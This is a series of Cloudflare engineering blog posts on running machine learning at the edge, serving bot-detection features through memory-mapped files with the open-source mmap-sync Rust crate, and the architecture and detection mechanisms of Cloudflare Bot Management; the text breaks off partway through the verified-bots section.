So you have to serve personalized experiences, and you have to do it fast. That’s where Constellation can come into play. With Constellation, as a part of your e-commerce application that may already be served from Cloudflare’s network through Workers or Pages, or even store data in D1, you can now perform tasks such as categorization (what demographic is this customer most likely in?) and personalization (if you bought this, you may also like that).
    
      Making devices smarter wherever they are
      
        
      
    
    Another use case where performance is critical is in interacting with the real world. Imagine a face recognition system that detects whether you’re human or not every time you go into your house. Every second of latency makes a difference (especially if you’re holding heavy groceries).
Running inference on Cloudflare’s network, means that within 95% of the world’s population, compute, and thus a decision, is never going to be more than 50ms away. This is in huge contrast to centralized compute, where if you live in Europe, but bought a doorbell system from a US-based company, may be up to hundreds of milliseconds round trip away.
You may be thinking, why not just run the compute on the device then?
For starters, running inference on the device doesn’t guarantee fast performance. Most devices with built in intelligence are run on microcontrollers, often with limited computational abilities (not a high-end GPU or server-grade CPU). Milliseconds become seconds; depending on the volume of workloads you need to process, the local inference might not be suitable. The compute that can be fit on devices is simply not powerful enough for high-volume complex operations, certainly not for operating at low-latency.
But even user experience aside (some devices don’t interface with a user directly), there are other downsides to running compute directly on devices.
The first is battery life — the longer the compute, the shorter the battery life. There's always a power consumption hit, even if you have a custom ASIC chip or a Tensor Processing Unit (TPU), meaning shorter battery life if that's one of your constraints. For consumer products, this means having to switch out your doorbell battery (lest you get locked out). For operating fleets of devices at scale (imagine watering devices in a field) this means costs of keeping up with, and swapping out batteries.
Lastly, device hardware, and even software, is harder to update. As new technologies or more efficient chips become available, upgrading fleets of hundreds or thousands of devices is challenging. And while software updates may be easier to manage, they’ll never be as easy as updating on-cloud software, where you can effortlessly ship updates multiple times a day!
Speaking of shipping software…
    
      AI applications, easier than ever with Constellation
      
        
      
    
    Speed Week is not just about making your applications or devices faster, but also your team!
For the past six years, our developer platform has been making it easy for developers to ship new code with Cloudflare Workers. With Constellation, it’s now just as easy to add Machine Learning to your existing application, with just a few commands.
And if you don’t believe us, don’t just take our word for it. We’re now in the process of opening up the beta to more and more customers. To request access, head on over to the Cloudflare Dashboard where you’ll see a new tab for Constellation. We encourage you to check out our tutorial for getting started with Constellation — this AI thing may be even easier than you expected it to be!
    
      We’re just getting started
      
        
      
    
    This is just the beginning of our journey for helping developers build AI driven applications, and we’re already thinking about what’s next.
We look forward to seeing what you build, and hearing your feedback. 


Every request, every microsecond: scalable machine learning at Cloudflare
Alex Bocharov — Mon, 19 Jun 2023 13:00:51 GMT
 
            
            
            
            
            
In this post, we will take you through the advancements we've made in our machine learning capabilities. We'll describe the technical strategies that have enabled us to expand the number of machine learning features and models, all while substantially reducing the processing time for each HTTP request on our network. Let's begin.
    
      Background
      
        
      
    
    For a comprehensive understanding of our evolved approach, it's important to grasp the context within which our machine learning detections operate. Cloudflare, on average, serves over 46 million HTTP requests per second, surging to more than 63 million requests per second during peak times.
Machine learning detection plays a crucial role in ensuring the security and integrity of this vast network. In fact, it classifies the largest volume of requests among all our detection mechanisms, providing the final Bot Score decision for over 72% of all HTTP requests. Going beyond, we run several machine learning models in shadow mode for every HTTP request.
At the heart of our machine learning infrastructure lies our reliable ally, CatBoost. It enables ultra low-latency model inference and ensures high-quality predictions to detect novel threats such as stopping bots targeting our customers' mobile apps. However, it's worth noting that machine learning model inference is just one component of the overall latency equation. Other critical components include machine learning feature extraction and preparation. In our quest for optimal performance, we've continuously optimized each aspect contributing to the overall latency of our system.
Initially, our machine learning models relied on single-request features, such as presence or value of certain headers. However, given the ease of spoofing these attributes, we evolved our approach. We turned to inter-request features that leverage aggregated information across multiple dimensions of a request in a sliding time window. For example, we now consider factors like the number of unique user agents associated with certain request attributes.
The extraction and preparation of inter-request features were handled by Gagarin, a Go-based feature serving platform we developed. As a request arrived at Cloudflare, we extracted dimension keys from the request attributes. We then looked up the corresponding machine learning features in the multi-layered cache. If the desired machine learning features were not found in the cache, a memcached "get" request was made to Gagarin to fetch those. Then machine learning features were plugged into CatBoost models to produce detections, which were then surfaced to the customers via Firewall and Workers fields and internally through our logging pipeline to ClickHouse. This allowed our data scientists to run further experiments, producing more features and models.
            
            
            
            
            
Previous system design for serving machine learning features over Unix socket using Gagarin.
Initially, Gagarin exhibited decent latency, with a median latency around 200 microseconds to serve all machine learning features for given keys. However, as our system evolved and we introduced more features and dimension keys, coupled with increased traffic, the cache hit ratio began to wane. The median latency had increased to 500 microseconds and during peak times, the latency worsened significantly, with the p99 latency soaring to roughly 10 milliseconds. Gagarin underwent extensive low-level tuning, optimization, profiling, and benchmarking. Despite these efforts, we encountered the limits of inter-process communication (IPC) using Unix Domain Socket (UDS), among other challenges, explored below.
    
      Problem definition
      
        
      
    
    In summary, the previous solution had its drawbacks, including:
High tail latency: during the peak time, a portion of requests experienced increased  latency caused by CPU contention on the Unix socket and Lua garbage collector.
Suboptimal resource utilization: CPU and RAM utilization was not optimized to the full potential, leaving less resources for other services running on the server.
Machine learning features availability: decreased due to memcached timeouts, which resulted in a higher likelihood of false positives or false negatives for a subset of the requests.
Scalability constraints: as we added more machine learning features, we approached the scalability limit of our infrastructure.
Equipped with a comprehensive understanding of the challenges and armed with quantifiable metrics, we ventured into the next phase: seeking a more efficient way to fetch and serve machine learning features.
    
      Exploring solutions
      
        
      
    
    In our quest for more efficient methods of fetching and serving machine learning features, we evaluated several alternatives. The key approaches included:
Further optimizing Gagarin: as we pushed our Go-based memcached server to its limits, we encountered a lower bound on latency reductions. This arose from IPC over UDS synchronization overhead and multiple data copies, the serialization/deserialization overheads, as well as the inherent latency of garbage collector and the performance of hashmap lookups in Go.
Considering Quicksilver: we contemplated using Quicksilver, but the volume and update frequency of machine learning features posed capacity concerns and potential negative impacts on other use cases. Moreover, it uses a Unix socket with the memcached protocol, reproducing the same limitations previously encountered.
Increasing multi-layered cache size: we investigated expanding cache size to accommodate tens of millions of dimension keys. However, the associated memory consumption, due to duplication of these keys and their machine learning features across worker threads, rendered this approach untenable.
Sharding the Unix socket: we considered sharding the Unix socket to alleviate contention and improve performance. Despite showing potential, this approach only partially solved the problem and introduced more system complexity.
Switching to RPC: we explored the option of using RPC for communication between our front line server and Gagarin. However, since RPC still requires some form of communication bus (such as TCP, UDP, or UDS), it would not significantly change the performance compared to the memcached protocol over UDS, which was already simple and minimalistic.
After considering these approaches, we shifted our focus towards investigating alternative Inter-Process Communication (IPC) mechanisms.
    
      IPC mechanisms
      
        
      
    
    Adopting a first principles design approach, we questioned: "What is the most efficient low-level method for data transfer between two processes provided by the operating system?" Our goal was to find a solution that would enable the direct serving of machine learning features from memory for corresponding HTTP requests. By eliminating the need to traverse the Unix socket, we aimed to reduce CPU contention, improve latency, and minimize data copying.
To identify the most efficient IPC mechanism, we evaluated various options available within the Linux ecosystem. We used ipc-bench, an open-source benchmarking tool specifically designed for this purpose, to measure the latencies of different IPC methods in our test environment. The measurements were based on sending one million 1,024-byte messages forth and back (i.e., ping pong) between two processes.


  
    IPC method
    Avg duration, μs
    Avg throughput, msg/s
  


  
    eventfd (bi-directional)
    9.456
    105,533
  
  
    TCP sockets
    8.74
    114,143
  
  
    Unix domain sockets
    5.609
    177,573
  
  
    FIFOs (named pipes)
    5.432
    183,388
  
  
    Pipe
    4.733
    210,369
  
  
    Message Queue
    4.396
    226,421
  
  
    Unix Signals
    2.45
    404,844
  
  
    Shared Memory
    0.598
    1,616,014
  
  
    Memory-Mapped Files
    0.503
    1,908,613
  

Based on our evaluation, we found that Unix sockets, while taking care of synchronization, were not the fastest IPC method available. The two fastest IPC mechanisms were shared memory and memory-mapped files. Both approaches offered similar performance, with the former using a specific tmpfs volume in /dev/shm and dedicated system calls, while the latter could be stored in any volume, including tmpfs or HDD/SDD.
    
      Missing ingredients
      
        
      
    
    In light of these findings, we decided to employ memory-mapped files as the IPC mechanism for serving machine learning features. This choice promised reduced latency, decreased CPU contention, and minimal data copying. However, it did not inherently offer data synchronization capabilities like Unix sockets. Unlike Unix sockets, memory-mapped files are simply files in a Linux volume that can be mapped into memory of the process. This sparked several critical questions:
How could we efficiently fetch an array of hundreds of float features for given dimension keys when dealing with a file?
How could we ensure safe, concurrent and frequent updates for tens of millions of keys?
How could we avert the CPU contention previously encountered with Unix sockets?
How could we effectively support the addition of more dimensions and features in the future?
To address these challenges we needed to further evolve this new approach by adding a few key ingredients to the recipe.
    
      Augmenting the Idea
      
        
      
    
    To realize our vision of memory-mapped files as a method for serving machine learning features, we needed to employ several key strategies, touching upon aspects like data synchronization, data structure, and deserialization.
    
      Wait-free synchronization
      
        
      
    
    When dealing with concurrent data, ensuring safe, concurrent, and frequent updates is paramount. Traditional locks are often not the most efficient solution, especially when dealing with high concurrency environments. Here's a rundown on three different synchronization techniques:
With-lock synchronization: a common approach using mechanisms like mutexes or spinlocks. It ensures only one thread can access the resource at a given time, but can suffer from contention, blocking, and priority inversion, just as evident with Unix sockets.
Lock-free synchronization: this non-blocking approach employs atomic operations to ensure at least one thread always progresses. It eliminates traditional locks but requires careful handling of edge cases and race conditions.
Wait-free synchronization: a more advanced technique that guarantees every thread makes progress and completes its operation without being blocked by other threads. It provides stronger progress guarantees compared to lock-free synchronization, ensuring that each thread completes its operation within a finite number of steps.


  
    
    Disjoint Access Parallelism
    Starvation Freedom
    Finite Execution Time
  


  
    With lock
    
    
    
  
  
    Lock-free
    
    
    
  
  
    Wait-free
    
    
    
  

Our wait-free data access pattern draws inspiration from Linux kernel's Read-Copy-Update (RCU) pattern and the Left-Right concurrency control technique. In our solution, we maintain two copies of the data in separate memory-mapped files. Write access to this data is managed by a single writer, with multiple readers able to access the data concurrently.
We store the synchronization state, which coordinates access to these data copies, in a third memory-mapped file, referred to as "state". This file contains an atomic 64-bit integer, which represents an InstanceVersion and a pair of additional atomic 32-bit variables, tracking the number of active readers for each data copy. The InstanceVersion consists of the currently active data file index (1 bit), the data size (39 bits, accommodating data sizes up to 549 GB), and a data checksum (24 bits).
    
      Zero-copy deserialization
      
        
      
    
    To efficiently store and fetch machine learning features, we needed to address the challenge of deserialization latency. Here, zero-copy deserialization provides an answer. This technique reduces the time and memory required to access and use data by directly referencing bytes in the serialized form.
We turned to rkyv, a zero-copy deserialization framework in Rust, to help us with this task. rkyv implements total zero-copy deserialization, meaning no data is copied during deserialization and no work is done to deserialize data. It achieves this by structuring its encoded representation to match the in-memory representation of the source type.
One of the key features of rkyv that our solution relies on is its ability to access HashMap data structures in a zero-copy fashion. This is a unique capability among Rust serialization libraries and one of the main reasons we chose rkyv for our implementation. It also has a vibrant Discord community, eager to offer best-practice advice and accommodate feature requests.
            
            
            
            
            
Feature comparison: rkyv vs FlatBuffers and Cap'n Proto
    
      Enter mmap-sync crate
      
        
      
    
    Leveraging the benefits of memory-mapped files, wait-free synchronization and zero-copy deserialization, we've crafted a unique and powerful tool for managing high-performance, concurrent data access between processes. We've packaged these concepts into a Rust crate named mmap-sync, which we're thrilled to open-source for the wider community.
At the core of the mmap-sync package is a structure named Synchronizer. It offers an avenue to read and write any data expressible as a Rust struct. Users simply have to implement or derive a specific Rust trait surrounding struct definition - a task requiring just a single line of code. The Synchronizer presents an elegantly simple interface, equipped with "write" and "read" methods.
            impl Synchronizer {
    /// Write a given `entity` into the next available memory mapped file.
    pub fn write(&mut self, entity: &T, grace_duration: Duration) -> Result<(usize, bool), SynchronizerError> {
        …
    }

    /// Reads and returns `entity` struct from mapped memory wrapped in `ReadResult`
    pub fn read(&mut self) -> Result, SynchronizerError> {
        …
    }
}

/// FeaturesMetadata stores features along with their metadata
#[derive(Archive, Deserialize, Serialize, Debug, PartialEq)]
#[archive_attr(derive(CheckBytes))]
pub struct FeaturesMetadata {
    /// Features version
    pub version: u32,
    /// Features creation Unix timestamp
    pub created_at: u32,
    /// Features represented by vector of hash maps
    pub features: Vec>>,
}
            A read operation through the Synchronizer performs zero-copy deserialization and returns a "guarded" Result encapsulating a reference to the Rust struct using RAII design pattern. This operation also increments the atomic counter of active readers using the struct. Once the Result is out of scope, the Synchronizer decrements the number of readers.
The synchronization mechanism used in mmap-sync is not only "lock-free" but also "wait-free". This ensures an upper bound on the number of steps an operation will take before it completes, thus providing a performance guarantee.
The data is stored in shared mapped memory, which allows the Synchronizer to “write” to it and “read” from it concurrently. This design makes mmap-sync a highly efficient and flexible tool for managing shared, concurrent data access.
Now, with an understanding of the underlying mechanics of mmap-sync, let's explore how this package plays a key role in the broader context of our Bot Management platform, particularly within the newly developed components: the bliss service and library.
    
      System design overhaul
      
        
      
    
    Transitioning from a Lua-based module that made memcached requests over Unix socket to Gagarin in Go to fetch machine learning features, our new design represents a significant evolution. This change pivots around the introduction of mmap-sync, our newly developed Rust package, laying the groundwork for a substantial performance upgrade. This development led to a comprehensive system redesign and introduced two new components that form the backbone of our Bots Liquidation Intelligent Security System - or BLISS, in short: the bliss service and the bliss library.
            
            
            
            
            
    
      Bliss service
      
        
      
    
    The bliss service operates as a Rust-based, multi-threaded sidecar daemon. It has been designed for optimal batch processing of vast data quantities and extensive I/O operations. Among its key functions, it fetches, parses, and stores machine learning features and dimensions for effortless data access and manipulation. This has been made possible through the incorporation of the Tokio event-driven platform, which allows for efficient, non-blocking I/O operations.
    
      Bliss library
      
        
      
    
    Operating as a single-threaded dynamic library, the bliss library seamlessly integrates into each worker thread using the Foreign Function Interface (FFI) via a Lua module. Optimized for minimal resource usage and ultra-low latency, this lightweight library performs tasks without the need for heavy I/O operations. It efficiently serves machine learning features and generates corresponding detections.
In addition to leveraging the mmap-sync package for efficient machine learning feature access, our new design includes several other performance enhancements:
Allocations-free operation: bliss library re-uses pre-allocated data structures and performs no heap allocations, only low-cost stack allocations. To enforce our zero-allocation policy, we run integration tests using the dhat heap profiler.
SIMD optimizations: wherever possible, the bliss library employs vectorized CPU instructions. For instance, AVX2 and SSE4 instruction sets are used to expedite hex-decoding of certain request attributes, enhancing speed by tenfold.
Compiler tuning: We compile both the bliss service and library with the following flags for superior performance:
            [profile.release]
codegen-units = 1
debug = true
lto = "fat"
opt-level = 3
            Benchmarking & profiling: We use Criterion for benchmarking every major feature or component within bliss. Moreover, we are also able to use the Go pprof profiler on Criterion benchmarks to view flame graphs and more:
            cargo bench -p integration -- --verbose --profile-time 100

go tool pprof -http=: ./target/criterion/process_benchmark/process/profile/profile.pb
            This comprehensive overhaul of our system has not only streamlined our operations but also has been instrumental in enhancing the overall performance of our Bot Management platform. Stay tuned to witness the remarkable changes brought about by this new architecture in the next section.
    
      Rollout results
      
        
      
    
    Our system redesign has brought some truly "blissful" dividends. Above all, our commitment to a seamless user experience and the trust of our customers have guided our innovations. We ensured that the transition to the new design was seamless, maintaining full backward compatibility, with no customer-reported false positives or negatives encountered. This is a testament to the robustness of the new system.
As the old adage goes, the proof of the pudding is in the eating. This couldn't be truer when examining the dramatic latency improvements achieved by the redesign. Our overall processing latency for HTTP requests at Cloudflare improved by an average of 12.5% compared to the previous system.
This improvement is even more significant in the Bot Management module, where latency improved by an average of 55.93%.
            
            
            
            
            
Bot Management module latency, in microseconds.
More specifically, our machine learning features fetch latency has improved by several orders of magnitude:


  
    Latency metric
    Before (μs)
    After (μs)
    Change
  


  
    p50
    532
    9
    -98.30% or x59
  
  
    p99
    9510
    18
    -99.81% or x528
  
  
    p999
    16000
    29
    -99.82% or x551
  

To truly grasp this impact, consider this: with Cloudflare’s average rate of 46 million requests per second, a saving of 523 microseconds per request equates to saving over 24,000 days or 65 years of processing time every single day!
In addition to latency improvements, we also reaped other benefits from the rollout:
Enhanced feature availability: thanks to eliminating Unix socket timeouts, machine learning feature availability is now a robust 100%, resulting in fewer false positives and negatives in detections.
Improved resource utilization: our system overhaul liberated resources equivalent to thousands of CPU cores and hundreds of gigabytes of RAM - a substantial enhancement of our server fleet's efficiency.
Code cleanup: another positive spin-off has been in our Lua and Go code. Thousands of lines of less performant and less memory-safe code have been weeded out, reducing technical debt.
Upscaled machine learning capabilities: last but certainly not least, we've significantly expanded our machine learning features, dimensions, and models. This upgrade empowers our machine learning inference to handle hundreds of machine learning features and dozens of dimensions and models.
    
      Conclusion
      
        
      
    
    In the wake of our redesign, we've constructed a powerful and efficient system that truly embodies the essence of 'bliss'. Harnessing the advantages of memory-mapped files, wait-free synchronization, allocation-free operations, and zero-copy deserialization, we've established a robust infrastructure that maintains peak performance while achieving remarkable reductions in latency. As we navigate towards the future, we're committed to leveraging this platform to further improve our Security machine learning products and cultivate innovative features. Additionally, we're excited to share parts of this technology through an open-sourced Rust package mmap-sync.
As we leap into the future, we are building upon our platform's impressive capabilities, exploring new avenues to amplify the power of machine learning. We are deploying a new machine learning model built on BLISS with select customers. If you are a Bot Management subscriber and want to test the new model, please reach out to your account team.
Separately, we are on the lookout for more Cloudflare customers who want to run their own machine learning models at the edge today. If you’re a developer considering making the switch to Workers for your application, sign up for our Constellation AI closed beta. If you’re a Bot Management customer and looking to run an already trained, lightweight model at the edge, we would love to hear from you. Let's embark on this path to bliss together. 


Cloudflare Bot Management: machine learning and more
Alex Bocharov — Wed, 06 May 2020 11:00:00 GMT
 
    
      Introduction
      
        
      
    
    Building Cloudflare Bot Management platform is an exhilarating experience. It blends Distributed Systems, Web Development, Machine Learning, Security and Research (and every discipline in between) while fighting ever-adaptive and motivated adversaries at the same time.
This is the ongoing story of Bot Management at Cloudflare and also an introduction to a series of blog posts about the detection mechanisms powering it. I’ll start with several definitions from the Bot Management world, then introduce the product and technical requirements, leading to an overview of the platform we’ve built. Finally, I’ll share details about the detection mechanisms powering our platform.
Let’s start with Bot Management’s nomenclature.
    
      Some Definitions
      
        
      
    
    Bot - an autonomous program on a network that can interact with computer systems or users, imitating or replacing a human user's behavior, performing repetitive tasks much faster than human users could.
Good bots - bots which are useful to businesses they interact with, e.g. search engine bots like Googlebot, Bingbot or bots that operate on social media platforms like Facebook Bot.
Bad bots - bots which are designed to perform malicious actions, ultimately hurting businesses, e.g. credential stuffing bots, third-party scraping bots, spam bots and sneakerbots.
            
            
            
            
            
Bot Management - blocking undesired or malicious Internet bot traffic while still allowing useful bots to access web properties by detecting bot activity, discerning between desirable and undesirable bot behavior, and identifying the sources of the undesirable activity.
WAF - a security system that monitors and controls network traffic based on a set of security rules.
    
      Gathering requirements
      
        
      
    
    Cloudflare has been stopping malicious bots from accessing websites or misusing APIs from the very beginning, at the same time helping the climate by offsetting the carbon costs from the bots. Over time it became clear that we needed a dedicated platform which would unite different bot fighting techniques and streamline the customer experience. In designing this new platform, we tried to fulfill the following key requirements.
Complete, not complex - customers can turn on/off Bot Management with a single click of a button, to protect their websites, mobile applications, or APIs.
Trustworthy - customers want to know whether they can trust the website visitor is who they say they are and provide a certainty indicator for that trust level.
Flexible - customers should be able to define what subset of the traffic Bot Management mitigations should be applied to, e.g. only login URLs, pricing pages or sitewide.
Accurate - Bot Management detections should have a very small error, e.g. none or very few human visitors ever should be mistakenly identified as bots.
Recoverable - in case a wrong prediction was made, human visitors still should be able to access websites as well as good bots being let through.
Moreover, the goal for new Bot Management product was to make it work well on the following use cases:
            
            
            
            
            
    
      Technical requirements
      
        
      
    
    Additionally, to the product requirements above, we engineers had a list of must-haves for the new Bot Management platform. The most critical were:
Scalability - the platform should be able to calculate a score on every request, even at over 10 million requests per second.
Low latency - detections must be performed extremely quickly, not slowing down request processing by more than 100 microseconds, and not requiring additional hardware.
Configurability - it should be possible to configure what detections are applied on what traffic, including on per domain/data center/server level.
Modifiability - the platform should be easily extensible with more detection mechanisms, different mitigation actions, richer analytics and logs.
Security - no sensitive information from one customer should be used to build models that protect another customer.
Explainability & debuggability - we should be able to explain and tune predictions in an intuitive way.
Equipped with these requirements, back in 2018, our small team of engineers got to work to design and build the next generation of Cloudflare Bot Management.
    
      Meet the Score
      
        
      
    
    “Simplicity is the ultimate sophistication.”- Leonardo Da Vinci
Cloudflare operates on a vast scale. At the time of this writing, this means covering 26M+ Internet properties, processing on average 11M requests per second (with peaks over 14M), and examining more than 250 request attributes from different protocol levels. The key question is how to harness the power of such “gargantuan” data to protect all of our customers from modern day cyberthreats in a simple, reliable and explainable way?
Bot management is hard. Some bots are much harder to detect and require looking at multiple dimensions of request attributes over a long time, and sometimes a single request attribute could give them away. More signals may help, but are they generalizable?
When we classify traffic, should customers decide what to do with it or are there decisions we can make on behalf of the customer? What concept could possibly address all these uncertainty problems and also help us to deliver on the requirements from above?
As you might’ve guessed from the section title, we came up with the concept of Trusted Score or simply The Score - one thing to rule them all - indicating the likelihood between 0 and 100 whether a request originated from a human (high score) vs. an automated program (low score).
            
            
            
            
            
"One Ring to rule them all" by idreamlikecrazy, used under CC BY / Desaturated from original
Okay, let’s imagine that we are able to assign such a score on every incoming HTTP/HTTPS request, what are we or the customer supposed to do with it? Maybe it’s enough to provide such a score in the logs. Customers could then analyze them on their end, find the most frequent IPs with the lowest scores, and then use the Cloudflare Firewall to block those IPs. Although useful, such a process would be manual, prone to error and most importantly cannot be done in real time to protect the customer's Internet property.
Fortunately, around the same time we started worked on this system , our colleagues from the Firewall team had just announced Firewall Rules. This new capability provided customers the ability to control requests in a flexible and intuitive way, inspired by the widely known Wireshark®  language. Firewall rules supported a variety of request fields, and we thought - why not have the score be one of these fields? Customers could then write granular rules to block very specific attack types. That’s how the cf.bot_management.score field was born.
Having a score in the heart of Cloudflare Bot Management addressed multiple product and technical requirements with one strike - it’s simple, flexible, configurable, and it provides customers with telemetry about bots on a per request basis. Customers can adjust the score threshold in firewall rules, depending on their sensitivity to false positives/negatives. Additionally, this intuitive score allows us to extend our detection capabilities under the hood without customers needing to adjust any configuration.
So how can we produce this score and how hard is it? Let’s explore it in the following section.
    
      Architecture overview
      
        
      
    
    What is powering the Bot Management score? The short answer is a set of microservices. Building this platform we tried to re-use as many pipelines, databases and components as we could, however many services had to be built from scratch. Let’s have a look at overall architecture (this overly simplified version contains Bot Management related services):
            
            
            
            
            
    
      Core Bot Management services
      
        
      
    
    In a nutshell our systems process data received from the edge data centers, produce and store data required for bot detection mechanisms using the following technologies:
Databases & data stores - Kafka, ClickHouse, Postgres, Redis, Ceph.
Programming languages - Go, Rust, Python, Java, Bash.
Configuration & schema management - Salt, Quicksilver, Cap’n Proto.
Containerization - Docker, Kubernetes, Helm, Mesos/Marathon.
Each of these services is built with resilience, performance, observability and security in mind.
    
      Edge Bot Management module
      
        
      
    
    All bot detection mechanisms are applied on every request in real-time during the request processing stage in the Bot Management module running on every machine at Cloudflare’s edge locations. When a request comes in we extract and transform the required request attributes and feed them to our detection mechanisms. The Bot Management module produces the following output:
Firewall fields - Bot Management fields- cf.bot_management.score - an integer indicating the likelihood between 0 and 100 whether a request originated from an automated program (low score) to a human (high score).- cf.bot_management.verified_bot - a boolean indicating whether such request comes from a Cloudflare allowlisted bot.- cf.bot_management.static_resource - a boolean indicating whether request matches file extensions for many types of static resources.
Cookies - most notably it produces cf_bm, which helps manage incoming traffic that matches criteria associated with bots.
JS challenges - for some of our detections and customers we inject into invisible JavaScript challenges, providing us with more signals for bot detection.
Detection logs - we log through our data pipelines to ClickHouse details about each applied detection, used features and flags, some of which are used for analytics and customer logs, while others are used to debug and improve our models.
Once the Bot Management module has produced the required fields, the Firewall takes over the actual bot mitigation.
    
      Firewall integration
      
        
      
    
    The Cloudflare Firewall's intuitive dashboard enables users to build powerful rules through easy clicks and also provides Terraform integration. Every request to the firewall is inspected against the rule engine. Suspicious requests can be blocked, challenged or logged as per the needs of the user while legitimate requests are routed to the destination, based on the score produced by the Bot Management module and the configured threshold.
            
            
            
            
            
Firewall rules provide the following bot mitigation actions:
Log - records matching requests in the Cloudflare Logs provided to customers.
Bypass - allows customers to dynamically disable Cloudflare security features for a request.
Allow - matching requests are exempt from challenge and block actions triggered by other Firewall Rules content.
Challenge (Captcha) - useful for ensuring that the visitor accessing the site is human, and not automated.
JS Challenge - useful for ensuring that bots and spam cannot access the requested resource; browsers, however, are free to satisfy the challenge automatically.
Block - matching requests are denied access to the site.
Our Firewall Analytics tool, powered by ClickHouse and GraphQL API, enables customers to quickly identify and investigate security threats using an intuitive interface. In addition to analytics, we provide detailed logs on all bots-related activity using either the Logpull API and/or LogPush, which provides the easy way to get your logs to your cloud storage.
    
      Cloudflare Workers integration
      
        
      
    
    In case a customer wants more flexibility on what to do with the requests based on the score, e.g. they might want to inject new, or change existing, HTML page content, or serve incorrect data to the bots, or stall certain requests, Cloudflare Workers provide an option to do that. For example, using this small code-snippet, we can pass the score back to the origin server for more advanced real-time analysis or mitigation:
            addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})
 
async function handleRequest(request) {
  request = new Request(request);
 
  request.headers.set("Cf-Bot-Score", request.cf.bot_management.score)
 
  return fetch(request);
}
            Now let’s have a look into how a single score is produced using multiple detection mechanisms.
    
      Detection mechanisms
      
        
      
    
    
            
            
            
            
            
The Cloudflare Bot Management platform currently uses five complementary detection mechanisms, producing their own scores, which we combine to form the single score going to the Firewall. Most of the detection mechanisms are applied on every request, while some are enabled on a per-customer basis to better fit their needs.
            
            
            
            
            
            
            
            
            
            
Having a score on every request for every customer has the following benefits:
Ease of onboarding - even before we enable Bot Management in active mode, we’re able to tell how well it’s going to work for the specific customer, including providing historical trends about bot activity.
Feedback loop - availability of the score on every request along with all features has tremendous value for continuous improvement of our detection mechanisms.
Ensures scaling - if we can compute for score every request and customer, it means that every Internet property behind Cloudflare is a potential Bot Management customer.
Global bot insights - Cloudflare is sitting in front of more than 26M+ Internet properties, which allows us to understand and react to the tectonic shifts happening in security and threat intelligence over time.
Overall globally, more than third of the Internet traffic visible to Cloudflare is coming from bad bots, while Bot Management customers have the ratio of bad bots even higher at ~43%!
            
            
            
            
            
            
            
            
            
            
Let’s dive into specific detection mechanisms in chronological order of their integration with Cloudflare Bot Management.
    
      Machine learning
      
        
      
    
    The majority of decisions about the score are made using our machine learning models. These were also the first detection mechanisms to produce a score and to on-board customers back in 2018. The successful application of machine learning requires data high in Quantity, Diversity, and Quality, and thanks to both free and paid customers, Cloudflare has all three, enabling continuous learning and improvement of our models for all of our customers.
At the core of the machine learning detection mechanism is CatBoost  - a high-performance open source library for gradient boosting on decision trees. The choice of CatBoost was driven by the library’s outstanding capabilities:
Categorical features support - allowing us to train on even very high cardinality features.
Superior accuracy - allowing us to reduce overfitting by using a novel gradient-boosting scheme.
Inference speed - in our case it takes less than 50 microseconds to apply any of our models, making sure request processing stays extremely fast.
C and Rust API - most of our business logic on the edge is written using Lua, more specifically LuaJIT, so having a compatible FFI interface to be able to apply models is fantastic.
There are multiple CatBoost models run on Cloudflare’s Edge in the shadow mode on every request on every machine. One of the models is run in active mode, which influences the final score going to Firewall. All ML detection results and features are logged and recorded in ClickHouse for further analysis, model improvement, analytics and customer facing logs. We feed both categorical and numerical features into our models, extracted from request attributes and inter-request features built using those attributes, calculated and delivered by the Gagarin inter-requests features platform.
We’re able to deploy new ML models in a matter of seconds using an extremely reliable and performant Quicksilver configuration database. The same mechanism can be used to configure which version of an ML model should be run in active mode for a specific customer.
A deep dive into our machine learning detection mechanism deserves a blog post of its own and it will cover how do we train and validate our models on trillions of requests using GPUs, how model feature delivery and extraction works, and how we explain and debug model predictions both internally and externally.
    
      Heuristics engine
      
        
      
    
    Not all problems in the world are the best solved with machine learning. We can tweak the ML models in various ways, but in certain cases they will likely underperform basic heuristics. Often the problems machine learning is trying to solve are not entirely new. When building the Bot Management solution it became apparent that sometimes a single attribute of the request could give a bot away. This means that we can create a bunch of simple rules capturing bots in a straightforward way, while also ensuring lowest false positives.
The heuristics engine was the second detection mechanism integrated into the Cloudflare Bot Management platform in 2019 and it’s also applied on every request. We have multiple heuristic types and hundreds of specific rules based on certain attributes of the request, some of which are very hard to spoof. When any of the requests matches any of the heuristics - we assign the lowest possible score of 1.
The engine has the following properties:
Speed - if ML model inference takes less than 50 microseconds per model, hundreds of heuristics can be applied just under 20 microseconds!
Deployability - the heuristics engine allows us to add new heuristic in a matter of seconds using Quicksilver, and it will be applied on every request.
Vast coverage - using a set of simple heuristics allows us to classify ~15% of global traffic and ~30% of Bot Management customers’ traffic as bots. Not too bad for a few if conditions, right?
Lowest false positives - because we’re very sure and conservative on the heuristics we add, this detection mechanism has the lowest FP rate among all detection mechanisms.
Labels for ML - because of the high certainty we use requests classified with heuristics to train our ML models, which then can generalize behavior learnt from from heuristics and improve detections accuracy.
So heuristics gave us a lift when tweaked with machine learning and they contained a lot of the intuition about the bots, which helped to advance the Cloudflare Bot Management platform and allowed us to onboard more customers.
    
      Behavioral analysis
      
        
      
    
    Machine learning and heuristics detections provide tremendous value, but both of them require human input on the labels, or basically a teacher to distinguish between right and wrong. While our supervised ML models can generalize well enough even on novel threats similar to what we taught them on, we decided to go further. What if there was an approach which doesn’t require a teacher, but rather can learn to distinguish bad behavior from the normal behavior?
Enter the behavioral analysis detection mechanism, initially developed in 2018 and integrated with the Bot Management platform in 2019. This is an unsupervised machine learning approach, which has the following properties:
Fitting specific customer needs - it’s automatically enabled for all Bot Management customers, calculating and analyzing normal visitor behavior over an extended period of time.
Detects bots never seen before - as it doesn’t use known bot labels, it can detect bots and anomalies from the normal behavior on specific customer’s website.
Harder to evade - anomalous behavior is often a direct result of the bot’s specific goal.
Please stay tuned for a more detailed blog about behavioral analysis models and the platform powering this incredible detection mechanism, protecting many of our customers from unseen attacks.
    
      Verified bots
      
        
      
    
    So far we’ve discussed how to detect bad bots and humans. What about good bots, some of which are extremely useful for the customer website? Is there a need for a dedicated detection mechanism or is there something we could use from previously described detection mechanisms? While the majority of good bot requests (e.g. Googlebot, Bingbot, LinkedInbot) already have low score produced by other detection mechanisms, we also need a way to avoid accidental blocks of useful bots. That’s how the Firewall field cf.bot_management.verified_bot came into existence in 2019, allowing customers to decide for themselves whether they want to let all of the good bots through or restrict access to certain parts of the website.
The actual platform calculating Verified Bot flag deserves a detailed blog on its own, but in the nutshell it has the following properties:
